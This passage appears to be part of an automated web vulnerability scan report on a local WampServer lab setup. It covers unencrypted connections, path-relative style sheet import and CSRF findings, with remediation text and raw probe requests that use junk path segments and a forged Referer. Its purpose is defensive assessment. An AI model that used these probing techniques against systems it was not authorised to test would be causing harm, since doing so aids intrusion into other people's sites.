$cfg['Servers'][$i]['SignonURL'] = 'examples/signon.php';
?>
`

Example for IP address limited autologin
++++++++++++++++++++++++++++++++++++++++

If you want to automatically login when accessing phpMyAdmin locally while asking
for a password when accessing rem
...[SNIP]...
e MySQL servers
++++++++++++++++++++++++++++++++++++++++

You can configure any number of servers using :config:option:`$cfg['Servers']`,
following example shows two of them:

.. code-block:: php

<?php
$cfg['blowfish_secret']='multiServerExample70518';
//any string of your choice
$i = 0;

$i++; // server 1 :
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['verbose'] = 'no1';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
// more options for #1 ...

$i++; // server 2 :
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['verbose'] = 'no2';
$cfg['Servers'][$i]['host'] = 'remote.host.addr';//or ip:'10.9.8.1'
// this server must allow remote clients, e.g., host 10.9.8.%
// not only in mysql.host but also in the startup configuration
$cfg['Servers'][$i]['extension'] = 'mysqli';
// more options for #2 ...

// end of server sections
$cfg['ServerDefault'] = 0; // to choose the server on startup

// further general options ...
?>


.. _example-google-ssl:

Google Cloud SQL with SSL
+++++++++++++++++++++++++

To connect to Google Could SQL, you currently need to disable certificate
verification. This is caused by the certficate
...[SNIP]...

Request 2

GET /phpmyadmin/doc/html/_sources/config.txt HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:45 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:48 GMT
ETag: "1bdd6-574048ecc5400"
Accept-Ranges: bytes
Content-Length: 114134
Connection: close
Content-Type: text/plain

.. index:: config.inc.php

.. _config:

Configuration
=============

All configurable data is placed in :file:`config.inc.php` in phpMyAdmin's
toplevel directory. If this file does not exist, please
...[SNIP]...
xample-signon:

Example for signon authentication
+++++++++++++++++++++++++++++++++

This example uses :file:`examples/signon.php` to demonstrate usage of :ref:`auth_signon`:

.. code-block:: php

<?php
$i = 0;
$i++;
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'signon';
$cfg['Servers'][$i]['SignonSession'] = 'SignonSession';
$cfg['Servers'][$i]['SignonURL'] = 'examples/signon.php';
?>
`

Example for IP address limited autologin
++++++++++++++++++++++++++++++++++++++++

If you want to automatically login when accessing phpMyAdmin locally while asking
for a password when accessing rem
...[SNIP]...
e MySQL servers
++++++++++++++++++++++++++++++++++++++++

You can configure any number of servers using :config:option:`$cfg['Servers']`,
following example shows two of them:

.. code-block:: php

<?php
$cfg['blowfish_secret']='multiServerExample70518';
//any string of your choice
$i = 0;

$i++; // server 1 :
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['verbose'] = 'no1';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
// more options for #1 ...

$i++; // server 2 :
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['verbose'] = 'no2';
$cfg['Servers'][$i]['host'] = 'remote.host.addr';//or ip:'10.9.8.1'
// this server must allow remote clients, e.g., host 10.9.8.%
// not only in mysql.host but also in the startup configuration
$cfg['Servers'][$i]['extension'] = 'mysqli';
// more options for #2 ...

// end of server sections
$cfg['ServerDefault'] = 0; // to choose the server on startup

// further general options ...
?>


.. _example-google-ssl:

Google Cloud SQL with SSL
+++++++++++++++++++++++++

To connect to Google Could SQL, you currently need to disable certificate
verification. This is caused by the certficate
...[SNIP]...

Request 3

GET /phpmyadmin/doc/html/_sources/faq.txt HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 3

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:45 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:48 GMT
ETag: "16cbc-574048ecc5400"
Accept-Ranges: bytes
Content-Length: 93372
Connection: close
Content-Type: text/plain

.. _faq:

FAQ - Frequently Asked Questions
================================

Please have a look at our `Link section
<https://www.phpmyadmin.net/docs/>`_ on the official
phpMyAdmin homepage for in-dep
...[SNIP]...
-------------------------------------------------------------

Edit your :file:`config.inc.php` file and ensure there is nothing (I.E. no
blank lines, no spaces, no characters...) neither before the ``<?php`` tag at
the beginning, neither after the ``?>
`` tag at the end.

.. _faq2_2:

2.2 phpMyAdmin can't connect to MySQL. What's wrong?
----------------------------------------------------

Either there is an error with your PHP setup or your username
...[SNIP]...
13. Unencrypted communications

Summary

Severity:   Low
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue description

The application allows users to connect to it over unencrypted connections. An attacker suitably positioned to view a legitimate user's network traffic could record and monitor their interactions with the application and obtain any information the user supplies. Furthermore, an attacker able to modify traffic could use the application as a platform for attacks against its users and third-party websites. Unencrypted connections have been exploited by ISPs and governments to track users, and to inject adverts and malicious JavaScript. Due to these concerns, web browser vendors are planning to visually flag unencrypted connections as hazardous.

To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

Please note that using a mixture of encrypted and unencrypted communications is an ineffective defense against active attackers, because they can easily remove references to encrypted resources when these references are transmitted over an unencrypted connection.

Issue remediation

Applications should use transport-level encryption (SSL/TLS) to protect all communications passing between the client and the server. The Strict-Transport-Security HTTP header should be used to ensure that clients refuse to access the server over an insecure connection.

14. Path-relative style sheet import

There are 6 instances of this issue:

Issue background

Path-relative style sheet import vulnerabilities arise when the following conditions hold:

  1. A response contains a style sheet import that uses a path-relative URL (for example, the page at "/original-path/file.php" might import "styles/main.css").
  2. When handling requests, the application or platform tolerates superfluous path-like data following the original filename in the URL (for example, "/original-path/file.php/extra-junk/"). When superfluous data is added to the original URL, the application's response still contains a path-relative stylesheet import.
  3. The response in condition 2 can be made to render in a browser's quirks mode, either because it has a missing or old doctype directive, or because it allows itself to be framed by a page under an attacker's control.
  4. When a browser requests the style sheet that is imported in the response from the modified URL (using the URL "/original-path/file.php/extra-junk/styles/main.css"), the application returns something other than the CSS response that was supposed to be imported. Given the behavior described in condition 2, this will typically be the same response that was originally returned in condition 1.
  5. An attacker has a means of manipulating some text within the response in condition 4, for example because the application stores and displays some past input, or echoes some text within the current URL.

Given the above conditions, an attacker can execute CSS injection within the browser of the target user. The attacker can construct a URL that causes the victim's browser to import as CSS a different URL than normal, containing text that the attacker can manipulate.

Being able to inject arbitrary CSS into the victim's browser may enable various attacks, including:

Issue remediation

The root cause of the vulnerability can be resolved by not using path-relative URLs in style sheet imports. Aside from this, attacks can also be prevented by implementing all of the following defensive measures:


14.1. http://localhost/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://localhost
Path:   /

Issue detail

The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):
  1. The original response contains a path-relative style sheet import (see response 1).
  2. When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
  3. Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
  4. When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.

Request 1

GET /?lang=czech HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Content-Length: 5578
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
   <title>WAMPSERVER P..ehled</title>
   <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width">
   <link id="stylecall" rel="stylesheet" href="wampthemes/classic/style.css" />
   <link rel="shortcut icon" href="index.php?img=favicon" type="image/ico" />
...[SNIP]...

Request 2

GET /index.php/irezts/?lang=czech HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:15 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Content-Length: 5578
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
   <title>WAMPSERVER P..ehled</title>
   <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width">
   <link id="stylecall" rel="stylesheet" href="wampthemes/classic/style.css" />
   <link rel="shortcut icon" href="index.php?img=favicon" type="image/ico" />
...[SNIP]...

Request 3

GET /index.php/irezts/wampthemes/classic/style.css HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

Response 3

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:16 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Content-Length: 5588
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
   <title>WAMPSERVER Homepage</title>
   <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=de
...[SNIP]...
14.2. http://localhost/examplewebiste/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /examplewebiste/

Issue detail

The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The response contains a path-relative style sheet import, and so condition 1 for an exploitable vulnerability is present (see issue background). The response can also be made to render in a browser's quirks mode. The page does not contain a doctype directive, and so it will always be rendered in quirks mode. Further, the response does not prevent itself from being framed, so an attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.) This means that condition 3 for an exploitable vulnerability is probably present if condition 2 is present.

We were not able to confirm that the other conditions hold, and you should manually investigate this issue to confirm whether they do hold.

Request 1

GET /examplewebiste/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6721
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</title>

       <link rel="stylesheet" type="text/css" href="examplewebiste/css/main.css" />

       <link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...
14.3. http://localhost/examplewebiste/about

Summary

Severity:   Information
Confidence:   Firm
Host:   http://localhost
Path:   /examplewebiste/about

Issue detail

The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):
  1. The original response contains a path-relative style sheet import (see response 1).
  2. When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
  3. Response 2 can be made to render in a browser's quirks mode. The page does not contain a doctype directive, and so it will always be rendered in quirks mode. Further, the response does not prevent itself from being framed, so an attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
  4. When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.

Request 1

GET /examplewebiste/about HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Location: about.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6204
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</title>

       <link rel="stylesheet" type="text/css" href="examplewebiste/css/main.css" />

       <link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...

Request 2

GET /examplewebiste/about/ke8f0o/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:26 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4840
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</title>

       <link rel="stylesheet" type="text/css" href="examplewebiste/css/main.css" />

       <link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...

Request 3

GET /examplewebiste/about/ke8f0o/examplewebiste/css/main.css HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

Response 3

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4840
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
14.4. http://localhost/examplewebiste/instructions

Summary

Severity:   Information
Confidence:   Firm
Host:   http://localhost
Path:   /examplewebiste/instructions

Issue detail

The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):
  1. The original response contains a path-relative style sheet import (see response 1).
  2. When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
  3. Response 2 can be made to render in a browser's quirks mode. The page does not contain a doctype directive, and so it will always be rendered in quirks mode. Further, the response does not prevent itself from being framed, so an attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
  4. When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.

Request 1

GET /examplewebiste/instructions HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Location: instructions.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 15378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</title>

       <link rel="stylesheet" type="text/css" href="examplewebiste/css/main.css" />

       <link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...

Request 2

GET /examplewebiste/instructions/i6ybi8/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:07:12 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 14014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</title>

       <link rel="stylesheet" type="text/css" href="examplewebiste/css/main.css" />

       <link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...

Request 3

GET /examplewebiste/instructions/i6ybi8/examplewebiste/css/main.css HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

Response 3

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:07:13 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 14014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
14.5. http://localhost/examplewebiste/vulnerabilities/brute/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/

Issue detail

The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The response contains a path-relative style sheet import, and so condition 1 for an exploitable vulnerability is present (see issue background). The response can also be made to render in a browser's quirks mode. The page does not contain a doctype directive, and so it will always be rendered in quirks mode. Further, the response does not prevent itself from being framed, so an attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.) This means that condition 3 for an exploitable vulnerability is probably present if condition 2 is present.

We were not able to confirm that the other conditions hold, and you should manually investigate this issue to confirm whether they do hold.

Request 1

GET /examplewebiste/vulnerabilities/brute/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:42 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4323
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</title>

       <link rel="stylesheet" type="text/css" href="../../examplewebiste/css/main.css" />

       <link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
14.6. http://localhost/phpsysinfo/index.php

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /phpsysinfo/index.php

Issue detail

The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The response contains a path-relative style sheet import, and so condition 1 for an exploitable vulnerability is present (see issue background). The response can also be made to render in a browser's quirks mode. The page does not contain a doctype directive, and so it will always be rendered in quirks mode. Further, the response does not prevent itself from being framed, so an attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.) This means that condition 3 for an exploitable vulnerability is probably present if condition 2 is present.

We were not able to confirm that the other conditions hold, and you should manually investigate this issue to confirm whether they do hold.

Request 1

GET /phpsysinfo/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:16 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Content-Length: 1688
Connection: close
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<link rel="shortcut icon" href="gfx/favicon.gif" />
<link type="text/css" rel="stylesheet" href="./templates/phpsysinfo.css" />
<title>
...[SNIP]...
15. Cross-site request forgery

There are 2 instances of this issue:

Issue background

Cross-site request forgery (CSRF) vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user that has issued a particular request. Because browsers automatically add cookies to requests regardless of their origin, it may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable application. For a request to be vulnerable to CSRF, the following conditions must hold:

Issue remediation

The most effective way to protect against CSRF vulnerabilities is to include within relevant requests an additional token that is not transmitted in a cookie: for example, a parameter in a hidden form field. This additional token should contain sufficient entropy, and be generated using a cryptographic random number generator, such that it is not feasible for an attacker to determine or predict the value of any token that was issued to another user. The token should be associated with the user's session, and the application should validate that the correct token is received before performing any action resulting from the request.

An alternative approach, which may be easier to implement, is to validate that Host and Referer headers in relevant requests are both present and contain the same domain name. However, this approach is somewhat less robust: historically, quirks in browsers and plugins have often enabled attackers to forge cross-domain requests that manipulate these headers to bypass such defenses.


15.1. http://localhost/add_vhost.php

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /add_vhost.php

Issue detail

The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right; however, it may facilitate exploitation of other vulnerabilities affecting application users.

Request 1

POST /add_vhost.php?lang=english HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/add_vhost.php?lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 135
Cookie: PHPSESSID=9dflduvhvd2bl3t0818dfugmoh

vh_name=176621&vh_folder=711144&vh_ip=182032&checkadd=1934982712&submit=Start+the+creation+of+the+VirtualHost+%28May+take+a+while...%29

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4972
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="fr">
   <head>
       <title>Ajouter un "Virtual Host"</title>
       <meta charset="UTF-8">
       <style>
           * {
               margin: 0;
               padding: 0;
           }

           html {
               background:
...[SNIP]...

Request 2

POST /add_vhost.php?lang=english HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://sGNou.com/add_vhost.php?lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 135
Cookie: PHPSESSID=ijpljt3jfnhra9b1smq3cka20p; security=low

vh_name=176621&vh_folder=711144&vh_ip=182032&checkadd=1934982712&submit=Start+the+creation+of+the+VirtualHost+%28May+take+a+while...%29

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:13:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4972
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="fr">
   <head>
       <title>Ajouter un "Virtual Host"</title>
